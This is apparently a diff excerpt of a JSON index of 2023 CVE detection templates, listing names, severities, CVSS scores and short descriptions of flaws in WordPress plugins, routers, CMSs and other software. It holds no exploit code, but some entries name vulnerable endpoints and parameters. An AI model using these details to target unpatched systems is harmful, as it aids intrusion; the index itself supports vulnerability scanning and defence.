{"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"} {"ID":"CVE-2023-30868","Info":{"Name":"Tree Page View Plugin \u003c 1.6.7 - Cross-Site Scripting","Severity":"medium","Description":"The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7. This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30868.yaml"}
@ -2102,7 +2110,7 @@
{"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"} {"ID":"CVE-2023-33629","Info":{"Name":"H3C Magic R300-2100M - Remote Code Execution","Severity":"high","Description":"H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2023/CVE-2023-33629.yaml"}
{"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"} {"ID":"CVE-2023-3368","Info":{"Name":"Chamilo LMS \u003c= v1.11.20 Unauthenticated Command Injection","Severity":"critical","Description":"Command injection in `/main/webservices/additional_webservices.php`\nin Chamilo LMS \u003c= v1.11.20 allows unauthenticated attackers to obtain\nremote code execution via improper neutralisation of special characters.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3368.yaml"}
{"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"} {"ID":"CVE-2023-33831","Info":{"Name":"FUXA - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A remote command execution (RCE) vulnerability in the /api/runscript endpoint of FUXA 1.1.13 allows attackers to execute arbitrary commands via a crafted POST request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-33831.yaml"}
{"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"} {"ID":"CVE-2023-34020","Info":{"Name":"Uncanny Toolkit for LearnDash - Open Redirection","Severity":"low","Description":"A vulnerability in the WordPress Uncanny Toolkit for LearnDash Plugin allowed malicious actors to redirect users, posing a potential risk of phishing incidents. The issue has been resolved in version 3.6.4.4, and users are urged to update for security.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-34020.yaml"}
{"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"} {"ID":"CVE-2023-34124","Info":{"Name":"SonicWall GMS and Analytics Web Services - Shell Injection","Severity":"critical","Description":"The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-34124.yaml"}
{"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"} {"ID":"CVE-2023-34192","Info":{"Name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","Severity":"critical","Description":"Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function.\n","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2023/CVE-2023-34192.yaml"}
{"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"} {"ID":"CVE-2023-34259","Info":{"Name":"Kyocera TASKalfa printer - Path Traversal","Severity":"medium","Description":"CCRX has a Path Traversal vulnerability. Path Traversal is an attack on web applications. By manipulating the value of the file path, an attacker can gain access to the file system, including source code and critical system settings.\n","Classification":{"CVSSScore":"4.9"}},"file_path":"http/cves/2023/CVE-2023-34259.yaml"}
@ -2159,7 +2167,7 @@
{"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"} {"ID":"CVE-2023-3849","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooDating 1.2. Affected is an unknown function of the file /find-a-match of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3849.yaml"}
{"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"} {"ID":"CVE-2023-38501","Info":{"Name":"CopyParty v1.8.6 - Cross Site Scripting","Severity":"medium","Description":"Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-38501.yaml"}
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"} {"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
{"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"} {"ID":"CVE-2023-39002","Info":{"Name":"OPNsense - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in the act parameter of system_certmanager.php in OPNsense before 23.7 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39002.yaml"}
{"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"} {"ID":"CVE-2023-39026","Info":{"Name":"FileMage Gateway - Directory Traversal","Severity":"high","Description":"Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39026.yaml"}
{"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"} {"ID":"CVE-2023-39108","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_b parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39108.yaml"}
{"ID":"CVE-2023-39109","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39109.yaml"} {"ID":"CVE-2023-39109","Info":{"Name":"rConfig 3.9.4 - Server-Side Request Forgery","Severity":"high","Description":"rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-39109.yaml"}
@ -2178,12 +2186,15 @@
{"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"} {"ID":"CVE-2023-40208","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_load function in versions up to, and including, 3.23.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40208.yaml"}
{"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"} {"ID":"CVE-2023-40779","Info":{"Name":"IceWarp Mail Server Deep Castle 2 v.13.0.1.2 - Open Redirect","Severity":"medium","Description":"An issue in IceWarp Mail Server Deep Castle 2 v.13.0.1.2 allows a remote attacker to execute arbitrary code via a crafted request to the URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-40779.yaml"}
{"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"} {"ID":"CVE-2023-4110","Info":{"Name":"PHPJabbers Availability Booking Calendar 5.0 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4110.yaml"}
{"ID":"CVE-2023-41109","Info":{"Name":"SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway - Command Injection","Severity":"critical","Description":"The SmartNode SN200 Analog Telephone Adapter (ATA) \u0026 VoIP Gateway is vulnerable to command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41109.yaml"}
{"ID":"CVE-2023-4111","Info":{"Name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4111.yaml"} {"ID":"CVE-2023-4111","Info":{"Name":"PHPJabbers Bus Reservation System 1.1 - Cross-Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4111.yaml"}
{"ID":"CVE-2023-4112","Info":{"Name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4112.yaml"} {"ID":"CVE-2023-4112","Info":{"Name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4112.yaml"}
{"ID":"CVE-2023-4113","Info":{"Name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4113.yaml"} {"ID":"CVE-2023-4113","Info":{"Name":"PHPJabbers Service Booking Script 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4113.yaml"}
{"ID":"CVE-2023-4114","Info":{"Name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4114.yaml"} {"ID":"CVE-2023-4114","Info":{"Name":"PHP Jabbers Night Club Booking 1.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4114.yaml"}
{"ID":"CVE-2023-4115","Info":{"Name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4115.yaml"} {"ID":"CVE-2023-4115","Info":{"Name":"PHPJabbers Cleaning Business 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4115.yaml"}
{"ID":"CVE-2023-4116","Info":{"Name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4116.yaml"} {"ID":"CVE-2023-4116","Info":{"Name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","Severity":"medium","Description":"A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4116.yaml"}
{"ID":"CVE-2023-41265","Info":{"Name":"Qlik Sense Enterprise - HTTP Request Smuggling","Severity":"critical","Description":"An HTTP Request Tunneling vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows a remote attacker to elevate their privilege by tunneling HTTP requests in the raw HTTP request. This allows them to send requests that get executed by the backend server hosting the repository application. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2023/CVE-2023-41265.yaml"}
{"ID":"CVE-2023-41266","Info":{"Name":"Qlik Sense Enterprise - Path Traversal","Severity":"medium","Description":"A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-41266.yaml"}
{"ID":"CVE-2023-4148","Info":{"Name":"Ditty \u003c 3.1.25 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4148.yaml"} {"ID":"CVE-2023-4148","Info":{"Name":"Ditty \u003c 3.1.25 - Cross-Site Scripting","Severity":"medium","Description":"The Ditty WordPress plugin before 3.1.25 does not sanitise and escape some parameters and generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4148.yaml"}
{"ID":"CVE-2023-41538","Info":{"Name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","Severity":"medium","Description":"PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41538.yaml"} {"ID":"CVE-2023-41538","Info":{"Name":"PHPJabbers PHP Forum Script 3.0 - Cross-Site Scripting","Severity":"medium","Description":"PhpJabbers PHP Forum Script 3.0 is vulnerable to Cross Site Scripting (XSS) via the keyword parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41538.yaml"}
{"ID":"CVE-2023-41642","Info":{"Name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","Severity":"medium","Description":"Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41642.yaml"} {"ID":"CVE-2023-41642","Info":{"Name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","Severity":"medium","Description":"Multiple reflected cross-site scripting (XSS) vulnerabilities in the ErroreNonGestito.aspx component of GruppoSCAI RealGimm 1.1.37p38 allow attackers to execute arbitrary Javascript in the context of a victim user's browser via a crafted payload injected into the VIEWSTATE parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-41642.yaml"}
@ -2191,7 +2202,9 @@
{"ID":"CVE-2023-4169","Info":{"Name":"Ruijie RG-EW1200G Router - Password Reset","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4169.yaml"} {"ID":"CVE-2023-4169","Info":{"Name":"Ruijie RG-EW1200G Router - Password Reset","Severity":"high","Description":"A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-4169.yaml"}
{"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"}
{"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"}
{"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"}
{"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"} {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"}
{"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"}
{"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"}
{"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"} {"ID":"CVE-2023-42793","Info":{"Name":"JetBrains TeamCity \u003c 2023.05.4 - Remote Code Execution","Severity":"critical","Description":"In JetBrains TeamCity before 2023.05.4 authentication bypass leading to RCE on TeamCity Server was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-42793.yaml"}
